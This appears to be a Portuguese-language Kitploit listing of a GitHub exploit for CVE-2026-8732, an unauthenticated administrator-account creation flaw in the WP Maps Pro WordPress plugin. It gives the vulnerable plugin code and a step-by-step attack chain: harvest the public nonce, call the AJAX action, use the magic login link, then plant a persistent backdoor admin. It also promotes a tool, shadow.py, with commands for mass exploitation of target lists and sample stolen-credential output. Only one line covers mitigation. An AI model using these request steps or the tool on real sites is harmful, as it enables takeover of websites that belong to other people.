Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-8732 — WP Maps Pro <= 6.1.0 - Escalação de Privilégios Não Autenticada via Criação de Conta de Administrador | Kitploit
Ferramentas/GitHubGitHub/xshadow-here/cve-2026-8732
Escalada de PrivilégiosAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubxshadow-here/cve-2026-8732

CVE-2026-8732

WP Maps Pro <= 6.1.0 - Escalação de Privilégios Não Autenticada via Criação de Conta de Administrador

Ver Repositório
1143há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-8732 — WP Maps Pro ≤ 6.1.0

♡ Escalação de Privilégio Não Autenticada via Criação de Conta de Administrador ♡
=== shadow ♡ & friska ===


📋 Informações da Vulnerabilidade

CampoDetalhes
ID CVECVE-2026-8732
Pontuação CVSS9.8 (Crítico)
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TipoAutenticação Ausente para Função Crítica
PluginWP Maps Pro (wp-google-map-gold)
AfetadoTodas as versões ≤ 6.1.0
Corrigido6.1.1
Publicado28 de maio de 2026
PesquisadorDavid Brown
PoCShadow & Friska 😈

🔍 Descrição

O plugin WP Maps Pro para WordPress é vulnerável a Escalação de Privilégio Não Autenticada via Criação de Conta de Administrador.

A ação AJAX wpgmp_temp_access_ajax é registrada com wp_ajax_nopriv_ e protegida apenas por uma verificação de nonce usando o nonce fc-call-nonce — que está publicamente embutido em todas as páginas do frontend via wp_localize_script como o campo nonce do objeto JavaScript wpgmp_local.

Isso torna a verificação do nonce completamente ineficaz como mecanismo de controle de acesso, permitindo que atacantes não autenticados:

  1. Extraiam o nonce de qualquer página pública
  2. Invoquem o manipulador wpgmp_temp_access_support com check_temp=false
  3. Disparem a criação incondicional de uma nova conta Administrador no WordPress
  4. Recebam uma URL mágica de login que chama wp_set_auth_cookie() — concedendo acesso total de administrador
  5. Criem uma conta backdoor persistente

Resultado: Comprometimento completo do site sem nenhuma autenticação prévia.


🧬 Análise da Causa Raiz

1. Hook Registrado Dentro do Bloco is_admin() — Mas is_admin() é Sempre Verdadeiro para AJAX

root@kitploit:~
// wp-google-map-gold.php
if ( is_admin() ) {  // ← is_admin() = VERDADEIRO para todas as requisições admin-ajax.php!
    add_action( 'wp_ajax_wpgmp_temp_access_ajax',        [ $this, 'wpgmp_temp_access_ajax_callback'] );
    add_action( 'wp_ajax_nopriv_wpgmp_temp_access_ajax', [ $this, 'wpgmp_temp_access_ajax_callback'] ); // ← nopriv = não autenticado!
}

2. Nonce Exposto a Todas as Páginas do Frontend

root@kitploit:~
// classes/wpgmp-helper.php
$wpgmp_local = [
    'urlforajax' => admin_url( 'admin-ajax.php' ),
    'nonce'      => wp_create_nonce( 'fc-call-nonce' ),  // ← VAZADO para o HTML público!
    // ...
];
wp_localize_script( 'wpgmp-google-map-main', 'wpgmp_local', $wpgmp_local );

Qualquer visitante pode ler o nonce do código-fonte da página. Nonces do WordPress são tokens CSRF — não tokens de autenticação.

3. Nenhuma Verificação de Capacidade no Callback AJAX

root@kitploit:~
function wpgmp_temp_access_ajax_callback(){
    check_ajax_referer( 'fc-call-nonce', 'nonce' );  // ← contornado via nonce público
    // NENHUMA verificação current_user_can()!
    $temp_access = new WPGMP_Temp_Access();
    $response = $temp_access->wpgmp_temp_access_support();
    wp_send_json($response);
}

4. Criação Incondicional de Conta de Administrador

root@kitploit:~
// classes/wpgmp-temp-access.php
if (isset($_POST['check_temp']) && $_POST['check_temp'] == 'false') {
    $username = 'fc_user_' . uniqid();          // nome de usuário aleatório
    $email    = '[email protected]';       // e-mail fixo
    $role     = 'administrator';                 // função fixa ← CAUSA RAIZ

    $result = self::fc_create_new_user($username, $email, $role);

    if (is_numeric($result)) {
        $access_link = self::generate_login_link($result);
        $response['url'] = $access_link;         // ← URL mágica retornada ao atacante!
    }
}

5. Login Mágico via Hook init — Sem Expiração, Sem Uso Único

root@kitploit:~
// Vinculado ao init — executa em TODA requisição, sem autenticação necessária
function wpgmp_access_token_check(){
    if ( ! empty( $_GET['wpgmp_token'] ) ) {
        $temp_access->get_valid_user_based_on_wpgmp_token($wpgmp_access_token);
    }
}

// Dentro de get_valid_user_based_on_wpgmp_token():
wp_set_current_user( $temporary_user_id, $temporary_user_login );
wp_set_auth_cookie( $temporary_user_id );   // ← SESSÃO DEFINIDA COMO ADMIN
wp_safe_redirect( admin_url() );            // ← REDIRECIONA PARA O PAINEL

⚔️ Cadeia de Ataque

root@kitploit:~
[Atacante Não Autenticado]
         │
         ▼
   GET /any-page/
   ← HTML: wpgmp_local = {"nonce":"XXXXXXXX",...}
         │
         ▼
   POST /wp-admin/admin-ajax.php
   action=wpgmp_temp_access_ajax
   nonce=XXXXXXXX
   check_temp=false
   ← {"url":"https://target.com/wp-admin/?wpgmp_token=<128-hex>"}
         │
         ▼
   GET /wp-admin/?wpgmp_token=<128-hex>
   ← wp_set_auth_cookie() disparado
   ← 302 → /wp-admin/
         │
         ▼
   [Acesso Completo de Administrador] 💀
         │
         ▼
   POST /wp-json/wp/v2/users
   X-WP-Nonce: <rest-nonce>
   {"username":"backdoor","password":"...","roles":["administrator"]}
         │
         ▼
   [Backdoor Persistente Criado] 😈

🛠️ Ferramentas

shadow.py — Cadeia de Exploração Completa

Alvo único ou exploração em massa.

root@kitploit:~
# Interativo
python3 shadow.py

# Alvo único
python3 shadow.py -u https://target.com

# Exploração em massa
python3 shadow.py -f targets.txt -t 20

Fases da Exploração:

root@kitploit:~
Fase 1  ▶  Detecção do Plugin e Funcionalidades
Fase 2  ▶  Varredura de Nonce (crawler paralelo)
Fase 3  ▶  Criação de Admin via AJAX
Fase 4  ▶  Login Mágico (wp_set_auth_cookie)
Fase 5  ▶  Backdoor Persistente (REST API)

Saída (pwned.txt):

root@kitploit:~
1.
=======================================================
Alvo      : https://target.com/wp-admin/
Usuário   : shadow_xxxxx
Senha     : Xk9#mQ2pLrTv8nYw
E-mail    : [email protected]
Mágica    : https://target.com/wp-admin/?wpgmp_token=...
=======================================================

Cookies :

=======================================================
wordpress_logged_in_...=fc_user_...
=======================================================

🔒 Mitigação

Atualize o WP Maps Pro para a versão 6.1.1 ou superior.


[shadow ♡ friska] — para fins educacionais e pesquisa de segurança autorizada apenas

Baixar ferramenta